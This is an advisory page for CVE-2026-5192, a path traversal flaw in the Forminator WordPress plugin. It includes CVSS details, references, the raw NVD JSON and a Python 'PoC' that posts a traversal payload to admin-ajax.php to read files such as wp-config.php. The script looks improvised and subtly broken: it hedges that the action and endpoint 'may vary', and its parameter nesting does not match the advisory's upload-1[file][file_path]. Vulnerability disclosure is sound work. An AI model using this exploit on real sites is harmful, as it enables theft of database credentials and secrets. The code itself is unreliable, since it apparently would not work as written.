Security Vulnerability Report
CVE-2026-5192 CVSS 7.5 HIGH

Published: 2026-05-05 07:16:01
Last Modified: 2026-05-05 19:08:20

Description

The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 1.52.1 via the 'upload-1[file][file_path]' parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Successful exploitation requires a publicly accessible form with a File Upload field where Save and Continue is enabled in that form's Behavior settings and the Save and Continue email notification is configured to attach uploaded files in Email Notifications.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Forminator Forms <= 1.52.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: Forminator Forms < 1.52.1 - Unauthenticated Path Traversal
# Description: Read arbitrary files via upload-1[file][file_path] parameter.

def exploit(url, target_file):
    # Target endpoint usually points to the forminator submission or upload handler
    # Adjust the endpoint based on the specific form ID and configuration
    target_url = f"{url}/wp-admin/admin-ajax.php"

    # The payload attempts to read wp-config.php
    data = {
        'action': 'forminator_submit_form_custom_forms',  # Action may vary
        'form_id': '1',
        'current_url': url,
        'upload-1': {
            'file_name': 'exploit.txt',
            'file_path': target_file,  # Path traversal payload, e.g., '../../../wp-config.php'
            'file_size': 1000
        }
    }

    # Note: Real exploitation requires matching the specific nonce and form structure
    # if enforced, but this CVE states unauthenticated access under specific conditions.
    try:
        response = requests.post(target_url, data=data)
        if response.status_code == 200:
            print(f"[+] Request sent. Check if file content is leaked in response or email.")
            print(response.text)
    except Exception as e:
        print(f"[-] Error: {e}")

# Usage
# exploit('http://target-site.com', '../../../wp-config.php')

References

https://plugins.trac.wordpress.org/changeset/3500671/forminator
https://www.wordfence.com/threat-intel/vulnerabilities/id/788422c4-e070-48aa-a85d-a5d5a25a6a1d?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-5192",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-05T07:16:00.643",
    "lastModified": "2026-05-05T19:08:20.090",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Forminator Forms – Contact Form, Payment Form & Custom Form Builder plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 1.52.1 via the 'upload-1[file][file_path]' parameter. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Successful exploitation requires a publicly accessible form with a File Upload field where Save and Continue is enabled in that form's Behavior settings and the Save and Continue email notification is configured to attach uploaded files in Email Notifications."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-22"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3500671/forminator",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/788422c4-e070-48aa-a85d-a5d5a25a6a1d?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}